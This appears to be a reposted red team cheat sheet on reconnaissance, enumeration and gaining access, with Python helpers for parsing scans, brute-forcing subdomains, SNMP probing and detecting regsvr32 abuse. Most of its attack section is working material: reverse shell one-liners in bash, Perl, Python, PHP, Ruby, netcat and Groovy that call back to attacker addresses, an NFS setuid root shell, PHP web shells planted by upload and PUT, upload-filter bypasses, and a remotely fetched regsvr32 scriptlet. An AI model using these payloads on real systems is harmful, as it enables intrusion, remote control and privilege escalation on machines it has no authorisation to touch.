Red Team Notes

https://www.bilibili.com/video/BV1Nz4y1e7F4/?spm_id_from=333.1007.tianma.1-4-4.click&vd_source=f876921555c8be858dfa9796837ecb79

Introduction

Explores some common offensive security techniques: obtaining code execution, code injection, defense evasion, lateral movement, persistence, and so on.

Our goal

The goal of this project is simple: read other researchers' work, carry out some common and uncommon attack techniques in a lab environment, do my own research, and:

Understand how the various network attacks and techniques are carried out and how they work

Learn how to write malware

Write code to better understand the tools and techniques used by attackers and malware authors

Learn more about C++, Windows internals and the Windows API

See which artifacts techniques and tools leave behind on the endpoint

Try out various industry tools for penetration testing, coding, debugging, reverse engineering and malware analysis, and become more proficient with them

Take notes for future reference

Reconnaissance / Enumeration

Extracting live IPs from an Nmap scan

nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
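The grep/cut one-liner above works because every host line in greppable output starts with `Host: <ip>`, but it also matches the `open|filtered` state that UDP scans produce and tells you nothing about which ports were open. The following parser is an added example (not code from the original page); it reads the same `-oG` format from a constructed sample and returns host-to-open-port mappings, with the matched states as a parameter so the UDP case is an explicit choice rather than an accident.

```python
"""Parse nmap greppable (-oG) output: host -> open ports, without the grep/cut fragility."""

# Constructed sample of -oG output (tab-separated fields), not a real scan.
SAMPLE_OG = "\n".join([
    "# Nmap 7.94 scan initiated as: nmap -sV --open -oG scan-results 10.1.1.0/29",
    "Host: 10.1.1.1 ()\tStatus: Up",
    "Host: 10.1.1.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//nginx 1.18/\tIgnored State: closed (998)",
    "Host: 10.1.1.2 ()\tPorts: 161/open|filtered/udp//snmp///\tIgnored State: closed (999)",
    "Host: 10.1.1.3 ()\tStatus: Up",
    "# Nmap done at ... -- 8 IP addresses (3 hosts up) scanned",
])


def parse_greppable(text, states=("open",)):
    """Return {ip: [(port, proto, service), ...]} for ports whose state is in `states`.

    The -oG 'Ports:' field is a comma-separated list of
    port/state/proto/owner/service/rpcinfo/version/ entries.  Only hosts with at
    least one matching port are returned, which is what the grep "/open"
    one-liner approximates; a plain grep also matches the 'open|filtered' state
    that UDP scans report, whereas here that has to be opted into via `states`.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 5:
                    continue
                port, state, proto, _owner, service = parts[:5]
                if state in states:
                    hosts.setdefault(ip, []).append((int(port), proto, service))
    return hosts


def exposed_ips(text, states=("open",)):
    """The equivalent of the exposed-services-ips file: sorted unique IPs with matching ports."""
    return sorted(parse_greppable(text, states))


if __name__ == "__main__":
    for ip, ports in parse_greppable(SAMPLE_OG).items():
        print(ip, ports)
    print(exposed_ips(SAMPLE_OG, states=("open", "open|filtered")))
```

Feed it the real `scan-results` file with `parse_greppable(open("scan-results").read())`; the per-port tuples are what you want when building the target list for the service-specific checks further down.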

Simple port knocking

for x in 7000 8000 9000; do nmap -Pn --host-timeout 201ms --max-retries 0 -p $x 1.1.1.1; done

The options need two ASCII hyphens (the en dashes the page had are not valid option prefixes); a bare number after --host-timeout is seconds in current nmap, so the unit is given explicitly to keep each knock short. Hit the knock ports in order, then scan the port you expect to open.

DNS lookups, zone transfers and brute forcing

whois domain.com
dig {a|txt|ns|mx} domain.com
dig {a|txt|ns|mx} domain.com @ns1.domain.com
host -t {a|txt|ns|mx} megacorpone.com
host -a megacorpone.com
host -l megacorpone.com ns1.megacorpone.com
dnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com
dnsenum domain.com
nslookup   # interactive: 'set type=any', then 'ls -d domain.com' (zone transfer; the ls subcommand exists only in the Windows nslookup)
for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done
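The `host` loop above breaks silently against a wildcard zone: every name "has address", and the output is pure noise. The following is an added example (not from the original page) of the same brute force with the check a practitioner runs first: resolve a random label, and if it answers, discard every result that points at the wildcard address. The resolver is injected so the logic can be exercised offline; `fake_resolver` is a stand-in constructed for that purpose, and `domain.com` / the 203.0.113.x addresses are placeholders.

```python
"""Subdomain brute force with a wildcard-DNS sanity check."""
import random
import socket
import string


def brute_subdomains(domain, words, resolve=socket.gethostbyname):
    """Try word.domain for each word; return ({name: ip}, wildcard_ip_or_None).

    Before the loop a random, certainly non-existent label is resolved.  If it
    resolves, the zone has a wildcard record and every brute-forced name will
    "exist"; names that resolve to that same address are then dropped, since
    they carry no information.  `resolve` is injectable so the logic can be
    exercised offline (the default is the system resolver).
    """
    probe = "".join(random.choices(string.ascii_lowercase, k=12)) + "." + domain
    try:
        wildcard = resolve(probe)
    except socket.gaierror:
        wildcard = None

    found = {}
    for word in words:
        name = f"{word}.{domain}"
        try:
            ip = resolve(name)
        except socket.gaierror:
            continue  # NXDOMAIN: the usual outcome
        if wildcard is not None and ip == wildcard:
            continue  # answered by the wildcard, not a real host
        found[name] = ip
    return found, wildcard


def fake_resolver(table, wildcard=None):
    """Offline stand-in for gethostbyname: a fixed name->ip table, optional wildcard."""
    def resolve(name):
        if name in table:
            return table[name]
        if wildcard is not None:
            return wildcard
        raise socket.gaierror(-2, f"Name or service not known: {name}")
    return resolve


if __name__ == "__main__":
    # Constructed zone: two real hosts, no wildcard.
    zone = {"www.domain.com": "203.0.113.10", "mail.domain.com": "203.0.113.25"}
    words = ["www", "mail", "dev", "vpn"]
    print(brute_subdomains("domain.com", words, fake_resolver(zone)))
    # Same zone behind a wildcard: only hosts with their own records survive.
    print(brute_subdomains("domain.com", words, fake_resolver(zone, "203.0.113.1")))
```

Against a live target, call `brute_subdomains("domain.com", open("subdomains.txt").read().split())` and leave `resolve` at its default. A host that shares the wildcard address on purpose is lost this way; that is the accepted trade-off of the filter.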
Banner grabbing / manual HTTP requests

nc -v $TARGET 80
telnet $TARGET 80
curl -v $TARGET

NFS exported shares

List NFS exported shares:
showmount -e 192.168.110.102
...and check whether the export is 'rw,no_root_squash'. showmount only prints paths and allowed clients, not the options, so mount the export as root, create a file, and look at its owner: if it stays root instead of becoming nobody/nfsnobody, root is not squashed. If so, compile the sid-shell.c below:
#include <unistd.h>

int main(int argc, char **argv, char **envp)
{
    char *shell[] = { "/bin/bash", "-p", NULL };   /* -p: do not drop the effective uid */
    setgid(0); setuid(0);                         /* we run with euid 0 via the setuid bit */
    execve(shell[0], shell, envp);
    return 0;
}
...copy it onto the share as root from the attacking machine (the chown/chmod below have to run as root on the client side, which only takes effect because the server does not squash root), then on the target run sid-shell to spawn a root shell:
chown root:root sid-shell; chmod +s sid-shell; ./sid-shell
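The option that makes the trick above work lives in the server's /etc/exports, not in showmount output. The following is an added example (not code from the original page) of the check from the other side of the fence: it parses exports lines from a constructed sample file and flags the combinations an attacker is looking for (`rw` with `no_root_squash`, exports open to `*`, `insecure`). The paths and client addresses in the sample are made up.

```python
"""Audit /etc/exports lines for the no_root_squash / wildcard conditions the NFS privesc needs."""
import re

# Constructed exports file, not from a real host.
SAMPLE_EXPORTS = """
# backups: the classic privesc target
/srv/backup   10.0.0.0/24(rw,sync,no_root_squash)
/srv/public   *(ro,sync)
/home         192.168.1.5(rw,sync)   # root_squash is the default, so root becomes nobody here
/srv/noclient
"""

_CLIENT_RE = re.compile(r"([^(]*)(?:\((.*)\))?")


def parse_exports(text):
    """Return [(path, client, {options})] for every client of every export line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        if not clients:
            clients = ["*"]  # exportfs exports to everyone when no client is listed
        for client in clients:
            m = _CLIENT_RE.fullmatch(client)
            host = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, host, opts))
    return entries


def risky_exports(text):
    """Return [(path, client, [reasons])] for exports worth a closer look.

    no_root_squash is what makes 'chown root; chmod +s' work from the client,
    and it needs rw to plant the binary; '*' or a missing client means anyone
    who can reach port 2049 can mount it; 'insecure' allows mounts from
    unprivileged source ports, i.e. from any local user on a client.
    """
    findings = []
    for path, host, opts in parse_exports(text):
        reasons = []
        if "no_root_squash" in opts:
            reasons.append("no_root_squash: remote root keeps uid 0 on the export")
            if "rw" in opts:
                reasons.append("rw + no_root_squash: setuid-root binary can be planted")
        if host == "*":
            reasons.append("exported to every client")
        if "insecure" in opts:
            reasons.append("insecure: mounts from unprivileged source ports allowed")
        if reasons:
            findings.append((path, host, reasons))
    return findings


if __name__ == "__main__":
    for path, host, reasons in risky_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {host}: " + "; ".join(reasons))
```

Run it on a real file with `risky_exports(open("/etc/exports").read())`. Note that `/home` is not flagged: without an explicit `no_root_squash`, root is squashed by default and the setuid plant fails.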

Kerberos enumeration

# enumerate users (realm must be the Kerberos realm, i.e. the AD domain name; userdb selects the wordlist)
nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test',userdb=users.txt

HTTP brute forcing and vulnerability scanning

# gobuster v3 syntax (v2 had no 'dir' subcommand)
target=10.0.0.1; gobuster dir -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum

RPC / NetBios / SMB

rpcinfo -p $TARGET
nbtscan $TARGET

# list shares (-N: no password prompt)
smbclient -L //$TARGET -U "" -N

# null session (recent Samba/Windows builds often refuse anonymous SMB; try it anyway)
rpcclient -U "" -N $TARGET
smbclient -L //$TARGET -N
enum4linux $TARGET

SNMP

# Windows user accounts (LanManager MIB svUserTable)
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25

# Running programs (hrSWRunName)
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2

# Hostname (sysName)
snmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5

# Windows services (svSvcName)
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1

# Windows shares (svShareTable: name, path, comment)
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27

# TCP local ports (tcpConnLocalPort)
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.6.13.1.3

# Installed software (hrSWInstalledName)
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2

# brute-force community strings
onesixtyone -i snmp-ips.txt -c community.txt

snmp-check $TARGET
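Both snmpwalk and the community brute force above rely on the same small SNMPv1 exchange: a BER-encoded GetRequest carrying the community string and one OID, answered by a GetResponse, or by silence when the community string is wrong. The following is an added example (not code from the original page) that builds and parses that exchange by hand, so the packet bytes are visible; the `snmp_get` helper sends it over UDP/161, and the GetResponse in the usage section is constructed locally rather than captured from a real agent.

```python
"""SNMPv1 GetRequest/GetResponse built and parsed by hand (BER), to show what
snmpwalk -v1 -c public and onesixtyone actually put on the wire."""
import socket


def _tlv(tag, body):
    """BER type-length-value with short or long definite length."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + body


def encode_int(v):
    assert v >= 0
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))  # +8 keeps the sign bit clear


def encode_octets(b):
    return _tlv(0x04, b)


def encode_oid(oid):
    arcs = [int(a) for a in oid.strip(".").split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])       # first two arcs share one byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:                                   # base-128, high bit = "more follows"
            chunk.append((arc & 0x7F) | 0x80)
            arc >>= 7
        body.extend(reversed(chunk))
    return _tlv(0x06, bytes(body))


def build_snmp(pdu_tag, community, oid, request_id, value_tlv):
    """Message ::= SEQUENCE { version 0 (=v1), community, PDU { id, err, idx, varbinds } }."""
    varbind = _tlv(0x30, encode_oid(oid) + value_tlv)
    pdu = _tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, encode_int(0) + encode_octets(community.encode()) + pdu)


def build_get_request(community, oid, request_id=1):
    return build_snmp(0xA0, community, oid, request_id, b"\x05\x00")  # value = NULL


def _read_tlv(buf, pos):
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:
        k = n & 0x7F
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + n], pos + n


def _children(body):
    out, pos = [], 0
    while pos < len(body):
        tag, val, pos = _read_tlv(body, pos)
        out.append((tag, val))
    return out


def decode_oid(body):
    arcs, v = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        v = (v << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(v)
            v = 0
    return ".".join(map(str, arcs))


def parse_response(packet):
    """Return (community, error_status, [(oid, value_tag, value_bytes), ...])."""
    _, msg, _ = _read_tlv(packet, 0)
    _version, community, pdu = _children(msg)
    if pdu[0] != 0xA2:
        raise ValueError("not a GetResponse PDU")
    _req_id, err_status, _err_index, varbinds = _children(pdu[1])
    results = []
    for _, vb in _children(varbinds[1]):
        (_, oid_body), (vtag, vbody) = _children(vb)
        results.append((decode_oid(oid_body), vtag, vbody))
    return community[1].decode(), int.from_bytes(err_status[1], "big"), results


def snmp_get(host, community, oid, timeout=2.0):
    """Single GET over UDP/161.  SNMPv1 agents silently drop a wrong community
    string, so 'no answer' is exactly what a community brute force keys on."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, oid), (host, 161))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return parse_response(data)


if __name__ == "__main__":
    print(build_get_request("public", "1.3.6.1.2.1.1.5.0").hex())   # sysName.0
    # Constructed GetResponse, as an agent would answer with sysName "dc01".
    reply = build_snmp(0xA2, "public", "1.3.6.1.2.1.1.5.0", 1, encode_octets(b"dc01"))
    print(parse_response(reply))
```

`snmp_get(target, "public", "1.3.6.1.2.1.1.5.0")` is the single probe that `onesixtyone` repeats per community string; a `None` means the string was rejected (or the host filters UDP/161, which looks identical, so confirm with one known-good string first).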

SMTP

smtp-user-enum -U /usr/share/wordlists/names.txt -t $TARGET -m 150

Active Directory

# current domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# current forest info
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

# get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain

# get DC for currently authenticated session
nltest /dsgetdc:offense.local

# get domain trusts from cmd shell
nltest /domain_trusts

# get user info
nltest /user:"spotless"

# cmd: environment variables starting with L, including LOGONSERVER (the DC that authenticated this session)
set l

# cached Kerberos tickets for the session; shows the domain name and the DC that issued them
klist

# get all logon sessions, including NTLM-authenticated sessions
klist sessions

# cached krbtgt (TGT)
klist tgt

# cmd: environment variables starting with U (USERNAME, USERDOMAIN); whoami on older Windows systems
set u

# find DFS shares with ADModule
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name

# find DFS shares with ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name}

# check if the spooler service is running on a host (named pipe present)
powershell ls "\\dc01\pipe\spoolss"

Port listener (PowerShell)

# Start listener on port 443
$listener = [System.Net.Sockets.TcpListener]443; $listener.Start();

while($true)
{
$client = $listener.AcceptTcpClient();
Write-Host $client.client.RemoteEndPoint "connected!";
$client.Close();
start-sleep -seconds 1;
}

Gaining Access

Reverse Shell One-Liners

Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

URL-Encoded Perl: Linux

echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

(assumes the socket lands on file descriptor 3; if the shell does not come back, try 4 or 5)

Ruby

ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat without -e #1

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f

Netcat without -e #2

The attacker listens on two ports of 10.0.0.1: 443 receives the shell's output, 444 delivers the commands typed in. On the target:

nc 10.0.0.1 444 | /bin/sh | nc 10.0.0.1 443

telnet 10.0.0.1 444 | /bin/sh | telnet 10.0.0.1 443

Java

# Groovy syntax (e.g. a Jenkins script console)
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]); p.waitFor();

XTerm

xterm -display 10.0.0.1:1

JDWP RCE

print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())

Working with Restricted Shells

# rare cases: pass the command to ssh so it never goes through the restricted login shell, or launch bash through a wrapper that is allowed to execute binaries

ssh bill@localhost ls -l /tmp

nice /bin/bash

Interactive TTY Shells

/usr/bin/expect sh

python -c 'import pty; pty.spawn("/bin/sh")'

# execute one command with su as another user if you do not have access to the shell. Credit to g0blin.co.uk

python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","

(the rest of this one-liner is cut off in the source)

Uploading / POSTing files through a web upload form

# POST file
curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie"

# POST binary data to web form ("<" sends the file's contents as a plain form field, "@" as a file attachment)
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v

Putting files on a web host via the PUT verb

curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php

Generating payload patterns and calculating offsets

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q $EIP_VALUE
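The two Metasploit scripts are a few lines of logic: the pattern is every Upper/lower/digit triple in order, so any 3-byte window (and therefore any 4-byte register value) is unique within the first 20280 bytes, and the offset is just the index of that window. The following re-implementation is an added example (not code from the original page or from Metasploit); it also handles the byte-order detail that trips people up, namely that the value shown in EIP has to be unpacked little-endian before searching.

```python
"""pattern_create / pattern_offset in Python: locate the EIP overwrite offset."""
import string
import struct

MAX_UNIQUE = 26 * 26 * 10 * 3  # 20280 bytes before the Upper/lower/digit triples repeat


def pattern_create(length):
    """Metasploit-style cyclic pattern: 'Aa0Aa1...Aa9Ab0...'; every 3-byte window is unique."""
    if length > MAX_UNIQUE:
        raise ValueError(f"pattern longer than {MAX_UNIQUE} bytes is no longer unique")
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=MAX_UNIQUE):
    """Offset of `value` in the pattern, or -1.

    `value` may be the 4 characters seen in a register ('Aa4A'), an int, or a
    hex string as a debugger shows EIP (0x41346141).  Integers are unpacked
    little-endian, because on x86 the bytes that overwrote EIP sit in memory
    lowest byte first; a hit on the reversed needle means the value came from
    a big-endian dump or was typed backwards, which is still a usable answer.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii")
    elif value.lower().startswith("0x"):
        needle = struct.pack("<I", int(value, 16)).decode("ascii")
    else:
        needle = value
    pattern = pattern_create(length)
    idx = pattern.find(needle)
    if idx == -1:
        idx = pattern.find(needle[::-1])
    return idx


if __name__ == "__main__":
    print(pattern_create(40))
    print(pattern_offset("0x41346141"))  # EIP read from the debugger after the crash
```

Send `pattern_create(2000)` as the crashing input, read EIP, and `pattern_offset("0x<eip>")` gives the number of bytes before the saved return address; the next test is that many filler bytes followed by "BBBB" to confirm control.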

Bypassing file upload restrictions

file.php -> file.jpg

file.php -> file.php.jpg

file.asp -> file.asp;.jpg

file.gif (contains PHP code, but starts with the string GIF87a/GIF89a so magic-byte checks pass)

file.php%00.jpg (null-byte truncation of the name in older PHP/ASP upload handlers)

file.jpg with a PHP backdoor in its EXIF/comment metadata (see below)

.jpg -> proxy intercept -> rename to .php

Injecting PHP into a JPEG

exiv2 -c '<?php system($_REQUEST["cmd"]);?>' backdoor.jpeg
exiftool "-comment<=back.php" back.png

The image still has to be interpreted as PHP (renamed after upload, a double extension, or the .htaccess trick below); the metadata only carries the code past content checks.

Uploading .htaccess to interpret .blah as .php

AddType application/x-httpd-php .blah

Cracking passwords

Code Execution

Regsvr32 code execution: bypassing application whitelisting

Execution

<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

back.sct needs to be hosted on a web server so that it can be called like this:

regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dll

Observations

Note that the regsvr32 process exits almost immediately. This means that just by watching the process list on the victim machine, the malicious process may never show up at all, until you understand how it was invoked. Sysmon command-line logging (Event ID 1, ProcessCreate, which records the full CommandLine including the /i:http://... argument and scrobj.dll) is what makes this activity detectable.

Sysmon will also show regsvr32 establishing a network connection (Event ID 3, NetworkConnect) to the host serving the .sct file.
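As an added example (not code from the original page), here is the detection logic those two observations translate into, run over constructed Sysmon-style events reduced to the fields the rule needs: a regsvr32 ProcessCreate whose command line passes a remote URL or UNC path to `/i:` or loads scrobj.dll, and any NetworkConnect from regsvr32 at all. The third sample event is a plain local DLL registration and is left alone on purpose, since that is everyday installer noise.

```python
"""Detection logic for the regsvr32 /i:<url> scrobj.dll pattern over Sysmon-style events."""
import ntpath
import re

# Constructed events in the shape of Sysmon Event ID 1 (ProcessCreate) and
# Event ID 3 (NetworkConnect), reduced to the fields the rule needs.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\regsvr32.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 80},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\app.dll"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

# /i:<something remote>: an http(s) URL or UNC path handed to the DllInstall entry point.
REMOTE_INSTALL_ARG = re.compile(r"/i:\S*?(?:https?://|\\\\)", re.IGNORECASE)


def is_regsvr32(event):
    return ntpath.basename(event.get("Image", "")).lower() == "regsvr32.exe"


def classify(event):
    """Return a reason string if the event matches, else None."""
    if not is_regsvr32(event):
        return None
    if event["EventID"] == 1:
        cmd = event.get("CommandLine", "")
        if REMOTE_INSTALL_ARG.search(cmd):
            return "regsvr32 /i: with remote URL/UNC (Squiblydoo)"
        if re.search(r"scrobj\.dll|\.sct\b", cmd, re.IGNORECASE):
            return "regsvr32 loading scrobj.dll / .sct scriptlet"
        return None  # plain DLL registration: noisy but normal
    if event["EventID"] == 3:
        return f"regsvr32 network connection to {event.get('DestinationIp')}:{event.get('DestinationPort')}"
    return None


def detect(events):
    """Return [(index, reason)] for every matching event."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


if __name__ == "__main__":
    for i, reason in detect(SAMPLE_EVENTS):
        print(i, reason)
```

The Event ID 3 rule fires regardless of destination because regsvr32 has no legitimate reason to talk to the network; pair it with the ProcessCreate hit on the same ProcessGuid to tie the download to the command line that caused it.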


Please credit the source when reposting. Readers are welcome to check the sources cited in the article and to point out anything wrong or unclear, in the comments below or by e-mail to jaytp@qq.com
